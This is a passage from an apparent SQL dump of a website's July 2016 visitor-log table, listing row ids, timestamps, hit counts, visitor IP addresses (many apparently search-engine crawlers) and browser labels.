'40.77.167.39','other'),(46863,1467511529,1,1,0,0,'130.193.50.34','other'),(46864,1467511802,1,1,0,0,'141.8.183.19','other'),(46865,1467511919,1,1,0,0,'52.3.127.144','other'),(46866,1467511974,1,1,0,0,'141.8.183.25','other'),(46867,1467512243,1,1,0,0,'52.3.105.23','other'),(46868,1467512754,1,1,0,0,'5.255.253.67','other'),(46869,1467512903,1,1,0,0,'141.8.183.25','other'),(46870,1467512904,1,1,0,0,'130.193.50.34','other'),(46871,1467513580,1,0,1,0,'66.249.78.178',''),(46872,1467513781,1,1,0,0,'207.46.13.28','other'),(46873,1467515450,1,1,0,0,'141.8.142.58','other'),(46874,1467516220,1,1,0,0,'52.3.105.23','other'),(46875,1467516363,1,1,0,0,'130.193.51.19','other'),(46876,1467516387,1,1,0,0,'66.249.78.150','chrome'),(46877,1467516874,1,1,0,0,'40.77.167.39','other'),(46878,1467516892,1,1,0,0,'141.8.142.58','other'),(46879,1467517522,1,1,0,0,'130.193.50.34','other'),(46880,1467518054,1,1,0,0,'141.8.142.61','other'),(46881,1467518077,1,1,0,0,'130.193.51.19','other'),(46882,1467518381,1,1,0,0,'82.145.219.70','other'),(46883,1467518789,1,1,0,0,'207.46.13.101','other'),(46884,1467519725,1,1,0,0,'130.193.51.19','other'),(46885,1467519788,1,1,0,0,'130.193.50.34','other'),(46886,1467520867,1,1,0,0,'207.46.13.28','other'),(46887,1467521166,1,0,1,0,'66.249.78.143',''),(46888,1467521738,1,0,1,0,'66.249.78.178',''),(46889,1467521915,1,1,0,0,'151.80.31.165','other'),(46890,1467522138,1,1,0,0,'141.8.183.25','other'),(46891,1467522139,1,1,0,0,'141.8.142.58','other'),(46892,1467524290,1,1,0,0,'207.46.13.101','other'),(46893,1467524638,1,1,0,0,'130.193.51.19','other'),(46894,1467526360,1,0,1,0,'66.249.78.178',''),(46895,1467527440,1,1,0,0,'207.46.13.101','other'),(46896,1467528466,1,1,0,0,'141.8.183.25','other'),(46897,1467530124,1,1,0,0,'141.8.183.25','other'),(46898,1467530126,1,1,0,0,'130.193.50.34','other'),(46899,1467530787,1,1,0,0,'66.249.93.125','chrome'),(46900,1467531080,1,0,1,0,'68.180.229.171',''),(46901,1467531768,1,0,1,0,'66.249.78.178',''),(46902,1467532429,1,1,0,0,'37.55.224.245','firefox'),(46903,1467533954,1,1,0,0,'91.196.178.35','firefox'),(46904,1467535245,1,0,1,0,'66.249.78.143',''),(46905,1467535587,1,0,1,0,'66.249.78.171',''),(46906,1467535975,1,1,0,0,'207.46.13.28','other'),(46907,1467536284,1,1,0,0,'52.3.127.144','other'),(46908,1467539335,1,1,0,0,'164.132.161.54','other'),(46909,1467540122,1,1,0,0,'78.111.190.130','chrome'),(46910,1467540593,2,2,0,0,'130.180.211.55','chrome'),(46911,1467541013,1,1,0,0,'91.196.178.103','chrome'),(46912,1467541527,1,1,0,0,'52.3.127.144','other'),(46913,1467542178,1,1,0,0,'130.193.50.34','other'),(46914,1467542179,1,1,0,0,'141.8.142.67','other'),(46915,1467542249,1,1,0,0,'130.193.51.19','other'),(46917,1467542522,1,0,1,0,'66.249.78.178',''),(46918,1467544502,1,1,0,0,'207.46.13.28','other'),(46919,1467544781,2,2,0,0,'52.3.105.23','other'),(46920,1467545785,1,1,0,0,'52.3.105.23','other'),(46921,1467546032,1,1,0,0,'130.193.50.34','other'),(46922,1467546659,1,0,1,0,'66.249.78.178',''),(46923,1467547974,1,1,0,0,'207.46.13.28','other'),(46924,1467550217,1,1,0,0,'141.8.183.25','other'),(46925,1467550219,1,1,0,0,'141.8.142.58','other'),(46926,1467550505,1,1,0,0,'130.193.50.34','other'),(46927,1467552890,1,1,0,0,'130.193.51.19','other'),(46928,1467552891,1,1,0,0,'130.193.50.34','other'),(46929,1467553142,1,1,0,0,'94.158.95.184','chrome'),(46930,1467553359,1,1,0,0,'130.193.37.7','other'),(46931,1467553784,1,0,1,0,'66.249.78.171',''),(46932,1467554234,1,1,0,0,'40.77.167.15','other'),(46933,1467555001,1,0,1,0,'66.249.78.143',''),(46934,1467555124,1,0,1,0,'66.249.75.207',''),(46935,1467556833,1,1,0,0,'164.132.161.50','other'),(46936,1467557856,2,2,0,0,'130.193.50.34','other'),(46937,1467559224,1,1,0,0,'40.77.167.15','other'),(46938,1467559523,1,1,0,0,'180.76.15.142','other'),(46939,1467559840,1,1,0,0,'130.193.51.19','other'),(46940,1467559994,1,1,0,0,'180.76.15.31','other'),(46941,1467560178,1,1,0,0,'144.76.61.21','other'),(46942,1467561178,3,3,0,0,'207.46.13.101','other'),(46943,1467562068,1,0,1,0,'66.249.78.143',''),(46944,1467562402,1,0,1,0,'66.249.78.164',''),(46945,1467563136,1,1,0,0,'141.8.142.61','other'),(46946,1467563138,1,1,0,0,'141.8.142.58','other'),(46947,1467563542,1,1,0,0,'180.76.15.148','other'),(46948,1467564601,1,1,0,0,'207.46.13.101','other'),(46949,1467564920,1,1,0,0,'207.46.13.28','other'),(46950,1467565082,1,0,1,0,'66.249.78.164',''),(46951,1467565201,1,1,0,0,'130.193.50.34','other'),(46952,1467565432,2,2,0,0,'141.8.183.25','other'),(46953,1467565583,1,1,0,0,'130.193.51.19','other'),(46954,1467565706,1,1,0,0,'146.185.157.82','other'),(46955,1467566406,1,0,1,0,'66.249.78.164',''),(46956,1467566574,1,1,0,0,'52.3.105.23','other'),(46957,1467566921,1,1,0,0,'207.46.13.28','other'),(46958,1467567090,1,1,0,0,'130.193.50.34','other'),(46959,1467567091,1,1,0,0,'141.8.183.25','other'),(46960,1467568755,2,2,0,0,'141.8.183.25','other'),(46961,1467568971,2,2,0,0,'130.193.50.34','other'),(46962,1467569070,1,0,1,0,'66.249.78.150',''),(46963,1467570479,1,1,0,0,'91.196.178.168','firefox'),(46964,1467571175,1,1,0,0,'178.94.172.245','chrome'),(46965,1467571429,1,1,0,0,'141.8.142.58','other'),(46966,1467571566,1,0,1,0,'66.249.78.143',''),(46967,1467572852,4,4,0,0,'51.255.162.163','other'),(46968,1467573171,2,2,0,0,'141.8.183.25','other'),(46969,1467573639,1,0,1,0,'66.249.78.178',''),(46970,1467573768,2,2,0,0,'130.193.50.34','other'),(46971,1467573772,1,1,0,0,'141.8.142.61','other'),(46972,1467574297,1,1,0,0,'141.8.183.25','other'),(46973,1467574328,2,2,0,0,'207.46.13.101','other'),(46974,1467574450,1,1,0,0,'40.77.167.15','other'),(46975,1467575370,2,1,1,0,'66.249.78.164',''),(46976,1467576011,1,1,0,0,'207.46.13.44','other'),(46977,1467576110,1,1,0,0,'207.46.13.28','other'),(46978,1467576115,1,1,0,0,'130.193.51.19','other'),(46979,1467576116,1,1,0,0,'141.8.142.58','other'),(46980,1467576171,2,2,0,0,'130.193.50.34','other'),(46981,1467577660,1,0,1,0,'66.249.78.164',''),(46982,1467577677,1,0,1,0,'66.249.78.150',''),(46983,1467577891,1,1,0,0,'176.77.59.86','msie'),(46985,1467577892,1,1,0,0,'37.204.98.175','firefox'),(46986,1467577894,1,1,0,0,'178.140.87.197','opera'),(46987,1467578152,1,1,0,0,'207.46.13.28','other'),(46988,1467578567,1,1,0,0,'141.8.183.25','other'),(46989,1467578569,1,1,0,0,'130.193.50.34','other'),(46990,1467579251,2,2,0,0,'103.255.4.20','other'),(46991,1467579483,1,1,0,0,'130.193.50.34','other'),(46992,1467579484,1,1,0,0,'141.8.142.67','other'),(46993,1467579488,1,1,0,0,'5.255.253.9','other'),(46994,1467579778,1,1,0,0,'178.93.39.76','chrome'),(46995,1467580756,1,1,0,0,'207.46.13.101','other'),(46996,1467581281,3,3,0,0,'141.8.183.25','other'),(46997,1467581593,1,1,0,0,'130.193.50.34','other'),(46998,1467581594,1,1,0,0,'130.193.51.19','other'),(46999,1467583381,1,1,0,0,'207.46.13.101','other'),(47000,1467583514,1,1,0,0,'157.55.39.46','other'),(47001,1467584059,1,0,1,0,'66.249.78.136',''),(47002,1467584221,1,0,1,0,'66.249.78.164',''),(47003,1467585808,1,0,1,0,'66.249.78.178',''),(47004,1467586022,1,1,0,0,'93.158.152.9','other'),(47005,1467586023,1,1,0,0,'130.193.51.19','other'),(47006,1467586400,1,1,0,0,'93.158.152.84','other'),(47007,1467586401,1,1,0,0,'130.193.50.6','other'),(47008,1467586873,1,1,0,0,'141.8.183.25','other'),(47010,1467588393,1,1,0,0,'141.8.142.85','other'),(47011,1467588396,1,1,0,0,'5.255.253.53','other'),(47012,1467588816,2,2,0,0,'141.8.183.25','other'),(47013,1467588916,1,1,0,0,'130.193.50.34','other'),(47014,1467589188,1,1,0,0,'130.193.51.19','other'),(47015,1467589462,1,1,0,0,'66.249.78.178','chrome'),(47016,1467590367,1,1,0,0,'66.249.78.150','chrome'),(47017,1467590408,1,1,0,0,'66.249.78.178','chrome'),(47018,1467590726,1,1,0,0,'141.8.142.58','other'),(47019,1467591295,1,1,0,0,'157.55.39.9','other'),(47020,1467591826,1,1,0,0,'180.76.15.34','other'),(47021,1467591882,1,1,0,0,'52.3.127.144','other'),(47022,1467592295,1,1,0,0,'52.3.105.23','other'),(47023,1467593559,1,1,0,0,'213.239.205.207','other'),(47024,1467594095,8,8,0,0,'130.193.50.34','other'),(47025,1467594271,6,6,0,0,'141.8.183.25','other'),(47026,1467594315,1,1,0,0,'157.55.39.9','other'),(47027,1467594363,1,1,0,0,'130.193.51.19','other'),(47028,1467594510,1,0,1,0,'66.249.64.175',''),(47029,1467594626,1,1,0,0,'5.255.253.26','other'),(47030,1467594840,1,1,0,0,'141.8.142.58','other'),(47031,1467594892,1,1,0,0,'40.77.167.15','other'),(47032,1467595114,4,4,0,0,'130.193.50.34','other'),(47033,1467595403,2,2,0,0,'130.193.51.19','other'),(47034,1467595555,2,2,0,0,'141.8.183.25','other'),(47035,1467595902,1,1,0,0,'40.77.167.15','other'),(47036,1467596270,2,1,1,0,'66.249.78.178',''),(47037,1467596408,1,0,1,0,'66.249.78.143',''),(47038,1467596962,1,0,1,0,'66.249.78.136',''),(47039,1467598136,1,1,0,0,'141.8.142.62','other'),(47040,1467598137,1,1,0,0,'93.158.152.75','other'),(47041,1467598369,1,1,0,0,'141.8.183.19','other'),(47042,1467598372,1,1,0,0,'130.193.37.21','other'),(47043,1467598810,1,1,0,0,'130.193.37.7','other'),(47044,1467598813,1,1,0,0,'141.8.183.25','other'),(47045,1467598859,1,1,0,0,'207.46.13.101','other'),(47046,1467599122,1,0,1,0,'66.249.78.136',''),(47047,1467599124,1,1,0,0,'66.249.78.164','chrome'),(47048,1467599270,1,1,0,0,'82.145.211.88','other'),(47049,1467599396,1,1,0,0,'141.8.142.85','other'),(47050,1467599397,1,1,0,0,'141.8.142.25','other'),(47051,1467600735,1,1,0,0,'93.158.152.40','other'),(47052,1467601306,1,1,0,0,'141.8.142.85','other'),(47053,1467601525,1,1,0,0,'141.8.132.41','other'),(47054,1467601895,1,1,0,0,'141.8.183.25','other'),(47055,1467602410,1,1,0,0,'5.255.253.68','other'),(47056,1467602735,1,1,0,0,'157.55.39.9','other'),(47057,1467603689,1,1,0,0,'69.30.221.242','other'),(47058,1467605929,1,1,0,0,'141.8.183.25','other'),(47059,1467605953,5,5,0,0,'130.193.50.34','other'),(47060,1467605957,1,1,0,0,'141.8.142.58','other'),(47061,1467606916,1,1,0,0,'180.76.15.17','other'),(47062,1467607108,1,1,0,0,'130.193.50.34','other'),(47063,1467608957,1,0,1,0,'66.249.78.171',''),(47064,1467609024,1,1,0,0,'141.8.183.25','other'),(47065,1467609153,1,1,0,0,'40.77.167.15','other'),(47066,1467609206,1,1,0,0,'157.55.39.9','other'),(47067,1467609407,1,0,1,0,'66.249.78.150',''),(47068,1467609631,1,0,1,0,'66.249.78.178',''),(47069,1467609645,1,0,1,0,'66.249.78.164',''),(47070,1467610122,1,1,0,0,'141.8.183.25','other'),(47071,1467610124,1,1,0,0,'141.8.142.58','other'),(47072,1467611222,1,0,1,0,'68.180.229.171',''),(47073,1467612538,1,1,0,0,'141.8.183.25','other'),(47074,1467612693,3,3,0,0,'130.193.50.34','other'),(47075,1467612800,1,1,0,0,'141.8.142.58','other'),(47076,1467612974,1,1,0,0,'66.249.93.121','chrome'),(47077,1467613673,2,2,0,0,'91.196.178.67','firefox'),(47078,1467613827,1,1,0,0,'23.101.61.176','other'),(47079,1467613876,1,1,0,0,'104.45.18.178','other'),(47080,1467613882,1,1,0,0,'130.193.51.19','other'),(47081,1467613891,3,3,0,0,'91.196.179.33','other'),(47082,1467613918,1,1,0,0,'91.196.178.67','chrome'),(47083,1467613947,2,2,0,0,'94.179.36.191','other'),(47084,1467614015,1,1,0,0,'62.80.185.138','other'),(47085,1467614048,1,1,0,0,'130.193.50.34','other'),(47086,1467614170,1,1,0,0,'91.196.178.35','firefox'),(47087,1467614735,1,1,0,0,'5.255.253.26','other'),(47088,1467614739,1,1,0,0,'5.255.253.10','other'),(47089,1467614983,1,1,0,0,'91.196.178.104','opera'),(47090,1467615048,1,1,0,0,'178.92.170.227','firefox'),(47091,1467615062,1,1,0,0,'130.193.50.34','other'),(47092,1467615987,1,1,0,0,'40.78.146.128','other'),(47093,1467615990,1,1,0,0,'91.196.178.66','firefox'),(47094,1467616002,1,1,0,0,'91.196.178.68','chrome'),(47095,1467616162,1,1,0,0,'91.196.179.33','firefox'),(47096,1467616404,1,1,0,0,'95.135.90.126','chrome'),(47097,1467617654,6,6,0,0,'188.40.95.70','other'),(47098,1467617751,1,1,0,0,'176.122.98.124','chrome'),(47099,1467618266,1,0,1,0,'66.249.78.171',''),(47100,1467618492,1,1,0,0,'94.179.20.81','chrome'),(47101,1467618504,1,1,0,0,'130.193.50.34','other'),(47102,1467619345,1,0,1,0,'66.249.78.171',''),(47103,1467619752,1,1,0,0,'95.133.197.45','chrome'),(47104,1467621265,1,1,0,0,'157.55.39.46','other'),(47105,1467621424,1,1,0,0,'157.55.39.9','other'),(47106,1467621501,1,1,0,0,'91.196.178.69','firefox'),(47107,1467621579,1,1,0,0,'92.238.226.245','other'),(47108,1467621754,1,1,0,0,'52.3.127.144','other'),(47109,1467622176,1,1,0,0,'91.196.178.72','chrome'),(47110,1467622293,1,1,0,0,'91.196.178.68','chrome'),(47111,1467622964,1,1,0,0,'95.134.116.24','firefox'),(47112,1467623401,1,1,0,0,'91.124.218.14','chrome'),(47113,1467623583,1,0,1,0,'66.249.78.150',''),(47114,1467624528,1,1,0,0,'130.193.50.34','other'),(47115,1467624645,1,0,1,0,'66.249.78.150',''),(47116,1467624753,1,0,1,0,'66.249.78.171',''),(47117,1467625710,1,1,0,0,'180.76.15.137','other'),(47118,1467625981,1,1,0,0,'37.53.76.110','chrome'),(47119,1467626001,1,1,0,0,'92.112.201.124','firefox'),(47120,1467626798,25,25,0,0,'144.76.12.78','other'),(47121,1467627240,1,0,1,0,'66.249.78.143',''),(47122,1467627880,1,1,0,0,'176.32.0.10','firefox'),(47123,1467628254,2,2,0,0,'130.193.50.34','other'),(47124,1467628255,1,1,0,0,'141.8.183.25','other'),(47125,1467628676,1,1,0,0,'46.200.110.157','chrome'),(47126,1467629633,1,1,0,0,'37.53.224.142','other'),(47127,1467629837,1,0,1,0,'66.249.78.178',''),(47128,1467630158,1,0,1,0,'66.249.78.171',''),(47129,1467630359,1,1,0,0,'91.196.178.71','firefox'),(47130,1467630511,1,1,0,0,'180.76.15.135','other'),(47131,1467631541,1,0,1,0,'66.249.78.164',''),(47132,1467631577,1,0,1,0,'66.249.78.171',''),(47133,1467631902,2,2,0,0,'52.3.127.144','other'),(47134,1467632149,1,1,0,0,'178.92.170.227','firefox'),(47135,1467632190,2,2,0,0,'92.112.201.124','firefox'),(47136,1467632207,1,1,0,0,'46.211.70.123','chrome'),(47137,1467632656,1,1,0,0,'91.196.178.67','chrome'),(47138,1467632678,3,3,0,0,'91.196.178.67','firefox'),(47139,1467632964,1,1,0,0,'40.77.167.15','other'),(47140,1467633695,1,1,0,0,'66.102.9.103','chrome'),(47141,1467633744,1,1,0,0,'91.196.178.131','firefox'),(47142,1467634153,1,1,0,0,'91.196.178.69','chrome'),(47143,1467634180,1,1,0,0,'141.8.183.25','other'),(47144,1467634392,1,1,0,0,'193.200.151.226','chrome'),(47145,1467634680,1,1,0,0,'94.179.20.125','firefox'),(47146,1467634764,1,1,0,0,'141.8.142.67','other'),(47147,1467634765,1,1,0,0,'130.193.51.19','other'),(47148,1467634880,1,1,0,0,'91.196.177.94','chrome'),(47149,1467635161,1,1,0,0,'91.196.178.67','firefox'),(47150,1467635422,1,1,0,0,'130.193.50.34','other'),(47151,1467635694,2,2,0,0,'46.201.241.5','chrome'),(47152,1467635704,1,1,0,0,'52.3.127.144','other'),(47153,1467635760,1,0,1,0,'66.249.78.164',''),(47154,1467635784,1,1,0,0,'91.196.177.94','chrome'),(47155,1467635962,1,1,0,0,'92.112.201.124','firefox'),(47156,1467636531,1,1,0,0,'91.196.178.67','firefox'),(47157,1467637022,1,1,0,0,'46.133.3.41','other'),(47158,1467637026,1,1,0,0,'130.193.50.34','other'),(47159,1467637548,1,1,0,0,'91.196.177.94','firefox'),(47160,1467637553,1,0,1,0,'66.249.78.143',''),(47161,1467637795,1,0,1,0,'66.249.78.164',''),(47162,1467637800,1,0,1,0,'66.249.78.178',''),(47163,1467638249,1,1,0,0,'207.46.13.44','other'),(47164,1467638294,1,0,1,0,'66.249.78.171',''),(47165,1467638315,1,1,0,0,'37.53.227.243','chrome'),(47166,1467638563,1,1,0,0,'91.196.178.65','chrome'),(47167,1467638666,1,1,0,0,'46.174.242.159','chrome'),(47168,1467638839,2,2,0,0,'52.3.105.23','other'),(47169,1467638971,1,0,1,0,'68.180.229.171',''),(47170,1467639390,1,1,0,0,'178.95.156.201','chrome'),(47171,1467639400,1,1,0,0,'141.8.142.61','other'),(47172,1467639401,1,1,0,0,'130.193.50.34','other'),(47173,1467639612,1,1,0,0,'141.8.183.25','other'),(47174,1467639900,1,1,0,0,'91.196.178.67','firefox'),(47175,1467639938,1,1,0,0,'91.196.178.169','chrome'),(47176,1467640013,1,1,0,0,'37.112.228.165','msie'),(47177,1467640014,1,1,0,0,'91.196.178.36','chrome'),(47179,1467640015,1,1,0,0,'95.143.19.144','chrome'),(47180,1467640016,1,1,0,0,'128.69.78.233','opera'),(47181,1467640327,1,1,0,0,'157.55.39.9','other'),(47182,1467640913,1,1,0,0,'91.196.178.67','firefox'),(47183,1467641358,4,4,0,0,'188.40.95.70','other'),(47184,1467641556,1,1,0,0,'91.244.15.34','chrome'),(47185,1467641693,1,1,0,0,'91.196.178.167','chrome'),(47186,1467642153,1,1,0,0,'180.76.15.158','other'),(47187,1467642169,1,1,0,0,'91.196.178.164','other'),(47188,1467642264,2,0,2,0,'66.249.78.164',''),(47189,1467642426,2,2,0,0,'130.193.50.34','other'),(47190,1467642571,1,1,0,0,'94.179.20.81','chrome'),(47191,1467642608,1,1,0,0,'141.8.183.25','other'),(47192,1467642695,2,2,0,0,'130.193.51.19','other'),(47193,1467643151,1,1,0,0,'141.8.142.58','other'),(47194,1467644527,1,1,0,0,'91.196.178.71','firefox'),(47195,1467645324,1,1,0,0,'46.0.216.49','chrome'),(47196,1467645454,1,1,0,0,'46.201.88.139','chrome'),(47197,1467645497,1,1,0,0,'51.255.65.22','other'),(47198,1467645518,2,2,0,0,'141.8.183.25','other'),(47199,1467645552,1,1,0,0,'93.79.114.185','chrome'),(47200,1467646079,1,1,0,0,'52.3.105.23','other'),(47201,1467646481,1,1,0,0,'92.112.124.209','firefox'),(47202,1467647015,1,0,1,0,'66.249.78.171',''),(47203,1467647196,1,1,0,0,'130.193.50.34','other'),(47204,1467647491,1,0,1,0,'66.249.78.178',''),(47205,1467648320,1,1,0,0,'94.179.98.167','firefox'),(47206,1467648354,1,0,1,0,'66.249.78.136',''),(47207,1467648407,1,1,0,0,'141.8.183.25','other'),(47208,1467648411,1,1,0,0,'141.8.142.67','other'),(47209,1467648632,1,1,0,0,'157.55.39.9','other'),(47210,1467649454,1,0,1,0,'66.249.78.143',''),(47211,1467650118,2,2,0,0,'130.193.50.34','other'),(47212,1467650237,1,1,0,0,'141.8.183.25','other'),(47213,1467650293,1,1,0,0,'180.76.15.32','other'),(47214,1467650798,1,0,1,0,'66.249.78.178',''),(47215,1467651247,1,1,0,0,'92.112.124.209','firefox'),(47216,1467651260,1,1,0,0,'31.13.102.125','other'),(47217,1467651341,1,1,0,0,'212.113.43.91','chrome'),(47218,1467651489,1,1,0,0,'40.77.167.15','other'),(47219,1467652242,1,1,0,0,'212.113.43.91','chrome'),(47220,1467652704,1,1,0,0,'52.3.127.144','other'),(47221,1467652820,2,2,0,0,'130.193.50.34','other'),(47222,1467652930,1,1,0,0,'51.255.65.86','other'),(47223,1467653764,1,0,1,0,'66.249.78.143',''),(47224,1467654027,1,1,0,0,'92.112.124.209','firefox'),(47225,1467655167,2,2,0,0,'130.193.50.34','other'),(47226,1467655242,1,1,0,0,'40.77.167.15','other'),(47227,1467656639,1,0,1,0,'66.249.78.171',''),(47228,1467656661,1,1,0,0,'207.46.13.44','other'),(47229,1467656778,1,1,0,0,'130.193.50.34','other'),(47230,1467656779,1,1,0,0,'130.193.51.19','other'),(47231,1467656845,1,1,0,0,'157.55.39.9','other'),(47232,1467657840,1,1,0,0,'130.193.50.34','other'),(47233,1467657843,1,1,0,0,'130.193.51.19','other'),(47234,1467657901,1,1,0,0,'95.221.232.85','msie'),(47235,1467658581,1,1,0,0,'95.135.241.133','other'),(47236,1467658763,1,0,1,0,'66.249.78.164',''),(47237,1467658803,1,1,0,0,'52.3.105.23','other'),(47238,1467659896,20,20,0,0,'85.25.211.229','chrome'),(47240,1467659897,15,15,0,0,'85.25.211.229','msie'),(47242,1467659899,13,13,0,0,'85.25.211.229','firefox'),(47243,1467660056,1,0,1,0,'66.249.78.171',''),(47244,1467660191,1,1,0,0,'95.27.179.65','msie'),(47245,1467660325,1,1,0,0,'94.179.79.185','chrome'),(47246,1467660503,1,1,0,0,'66.249.78.136','chrome'),(47247,1467660634,1,0,1,0,'66.249.78.164',''),(47248,1467660912,1,1,0,0,'164.132.161.54','other'),(47249,1467660970,1,1,0,0,'176.121.224.14','opera'),(47250,1467661051,1,1,0,0,'130.193.50.34','other'),(47251,1467661053,1,1,0,0,'141.8.142.58','other'),(47252,1467661253,1,1,0,0,'141.8.183.25','other'),(47253,1467661418,1,1,0,0,'207.46.13.101','other'),(47254,1467662262,1,0,1,0,'66.249.78.171',''),(47255,1467662890,1,1,0,0,'180.76.15.138','other'),(47256,1467663250,1,0,1,0,'66.249.78.178',''),(47257,1467664200,2,0,2,0,'66.249.75.207',''),(47258,1467664316,1,1,0,0,'93.75.20.112','chrome'),(47259,1467665389,1,0,1,0,'66.249.78.143',''),(47260,1467665513,1,1,0,0,'66.249.78.136','chrome'),(47261,1467666081,1,1,0,0,'66.249.78.178','chrome'),(47262,1467666154,1,1,0,0,'164.132.161.28','other'),(47263,1467666509,1,1,0,0,'141.8.142.61','other'),(47264,1467666657,1,1,0,0,'130.193.51.19','other'),(47265,1467667400,1,1,0,0,'141.8.183.25','other'),(47266,1467667656,1,1,0,0,'66.249.78.136','chrome'),(47267,1467668330,1,1,0,0,'141.8.142.67','other'),(47268,1467668483,2,2,0,0,'141.8.183.25','other'),(47269,1467668817,2,2,0,0,'130.193.50.34','other'),(47270,1467668886,1,0,1,0,'68.180.229.171',''),(47271,1467669395,1,0,1,0,'66.249.78.150',''),(47272,1467669754,1,1,0,0,'91.196.178.168','chrome'),(47273,1467669913,1,1,0,0,'130.193.50.34','other'),(47274,1467669914,1,1,0,0,'141.8.142.61','other'),(47275,1467670984,1,1,0,0,'141.8.183.25','other'),(47276,1467670986,1,1,0,0,'141.8.142.58','other'),(47277,1467671951,1,1,0,0,'141.8.142.58','other'),(47278,1467671974,1,0,1,0,'66.249.78.178',''),(47279,1467672178,1,1,0,0,'130.193.51.19','other'),(47280,1467672307,1,1,0,0,'141.8.142.61','other'),(47281,1467672602,1,1,0,0,'207.46.13.44','other'),(47282,1467672639,1,1,0,0,'89.163.148.58','other'),(47283,1467672646,2,2,0,0,'141.8.183.25','other'),(47284,1467672860,1,1,0,0,'130.193.50.34','other'),(47285,1467673455,2,2,0,0,'130.193.51.19','other'),(47286,1467674098,1,1,0,0,'164.132.161.27','other'),(47287,1467674199,1,0,1,0,'66.249.78.143',''),(47288,1467674239,1,0,1,0,'66.249.78.178',''),(47289,1467674929,1,1,0,0,'130.193.50.34','other'),(47290,1467675265,1,1,0,0,'141.8.183.25','other'),(47291,1467676127,1,1,0,0,'180.76.15.142','other'),(47292,1467676184,2,2,0,0,'141.8.183.25','other'),(47293,1467676278,3,3,0,0,'130.193.50.34','other'),(47294,1467676314,1,1,0,0,'51.255.65.5','other'),(47295,1467678587,1,1,0,0,'51.255.65.25','other'),(47296,1467679275,1,1,0,0,'40.77.167.15','other'),(47297,1467680175,1,1,0,0,'141.8.183.25','other'),(47298,1467680309,1,1,0,0,'130.193.50.34','other'),(47299,1467680419,1,1,0,0,'141.8.142.58','other'),(47300,1467681231,2,2,0,0,'141.8.183.25','other'),(47301,1467681284,2,2,0,0,'37.139.23.46','other'),(47302,1467681376,1,1,0,0,'130.193.51.19','other'),(47303,1467682062,1,1,0,0,'52.3.105.23','other'),(47304,1467682215,2,2,0,0,'141.8.183.25','other'),(47305,1467683216,3,3,0,0,'130.193.50.34','other'),(47306,1467683317,1,1,0,0,'130.193.51.19','other'),(47307,1467683717,1,1,0,0,'141.8.183.25','other'),(47308,1467683941,4,4,0,0,'162.210.196.130','other'),(47309,1467684683,1,1,0,0,'51.255.65.78','other'),(47310,1467686226,1,1,0,0,'141.8.142.61','other'),(47311,1467686298,1,0,1,0,'66.249.75.247',''),(47312,1467686388,1,1,0,0,'51.255.65.96','other'),(47313,1467686470,1,0,1,0,'66.249.75.191',''),(47314,1467686522,1,1,0,0,'141.8.142.58','other'),(47315,1467687012,1,0,1,0,'66.249.78.171',''),(47316,1467687425,1,1,0,0,'52.3.127.144','other'),(47317,1467687458,2,2,0,0,'157.55.39.9','other'),(47318,1467688524,2,0,2,0,'68.180.229.171',''),(47319,1467688766,2,0,2,0,'66.249.78.150',''),(47320,1467689195,1,1,0,0,'52.3.105.23','other'),(47321,1467689368,1,1,0,0,'151.80.31.174','other'),(47322,1467689773,1,0,1,0,'66.249.78.171',''),(47323,1467690114,2,2,0,0,'130.193.50.34','other'),(47324,1467691143,1,1,0,0,'180.76.15.32','other'),(47325,1467693284,1,1,0,0,'51.255.65.4','other'),(47326,1467693780,1,1,0,0,'52.3.105.23','other'),(47327,1467694674,2,2,0,0,'141.8.183.25','other'),(47328,1467695071,1,1,0,0,'37.53.224.142','other'),(47329,1467695138,1,1,0,0,'207.46.13.44','other'),(47330,1467695368,1,1,0,0,'52.3.105.23','other'),(47331,1467695720,1,0,1,0,'66.249.78.164',''),(47332,1467695801,1,1,0,0,'91.196.178.68','chrome'),(47333,1467696487,1,1,0,0,'5.58.46.142','chrome'),(47334,1467696536,1,1,0,0,'91.196.177.94','firefox'),(47335,1467696560,1,0,1,0,'66.249.78.171',''),(47336,1467697497,1,0,1,0,'68.180.229.171',''),(47337,1467697961,1,1,0,0,'180.76.15.142','other'),(47338,1467698210,1,1,0,0,'141.8.183.25','other'),(47339,1467698211,1,1,0,0,'130.193.50.34','other'),(47340,1467698420,1,1,0,0,'66.249.93.117','chrome'),(47341,1467700265,1,1,0,0,'91.196.178.131','firefox'),(47342,1467700567,1,1,0,0,'40.77.167.15','other'),(47343,1467700594,1,1,0,0,'31.43.31.206','chrome'),(47344,1467701184,1,0,1,0,'66.249.78.150',''),(47345,1467701321,1,1,0,0,'93.73.234.193','firefox'),(47346,1467701408,1,1,0,0,'207.46.13.44','other'),(47347,1467702710,1,1,0,0,'178.95.244.104','firefox'),(47348,1467702875,1,1,0,0,'164.132.161.76','other'),(47349,1467702901,1,1,0,0,'91.196.178.67','firefox'),(47350,1467703376,1,1,0,0,'37.53.87.113','chrome'),(47351,1467703467,3,3,0,0,'130.193.51.19','other'),(47352,1467703719,1,1,0,0,'141.8.142.67','other'),(47353,1467703797,2,2,0,0,'141.8.142.58','other'),(47354,1467703847,2,2,0,0,'93.158.152.84','other'),(47355,1467703934,1,1,0,0,'130.193.50.34','other'),(47356,1467704033,1,0,1,0,'68.180.229.171',''),(47357,1467704396,1,1,0,0,'91.196.178.67','firefox'),(47358,1467704723,2,2,0,0,'141.8.183.25','other'),(47359,1467704725,1,1,0,0,'141.8.142.58','other'),(47360,1467705628,1,1,0,0,'176.77.104.83','msie'),(47361,1467705706,1,1,0,0,'130.193.51.19','other'),(47362,1467706482,1,1,0,0,'51.255.65.55','other'),(47363,1467706966,1,1,0,0,'66.249.78.171','chrome'),(47364,1467707129,1,0,1,0,'66.249.78.178',''),(47365,1467707442,1,1,0,0,'141.8.183.25','other'),(47366,1467708012,2,2,0,0,'52.3.105.23','other'),(47367,1467708556,1,1,0,0,'66.249.78.164','chrome'),(47368,1467709592,1,1,0,0,'52.3.105.23','other'),(47369,1467709770,1,0,1,0,'66.249.78.178',''),(47370,1467710995,1,1,0,0,'94.179.31.108','firefox'),(47371,1467711248,1,1,0,0,'178.95.244.104','firefox'),(47372,1467711617,2,0,2,0,'66.249.78.143',''),(47373,1467712117,3,3,0,0,'130.193.50.34','other'),(47374,1467712749,1,1,0,0,'130.193.51.79','other'),(47375,1467712832,2,2,0,0,'46.201.241.5','chrome'),(47376,1467713003,1,1,0,0,'40.77.167.15','other'),(47377,1467713540,2,2,0,0,'91.196.177.94','firefox'),(47378,1467713937,1,1,0,0,'91.196.178.97','chrome'),(47379,1467714252,2,2,0,0,'141.8.183.25','other'),(47380,1467714254,2,2,0,0,'130.193.51.19','other'),(47381,1467714387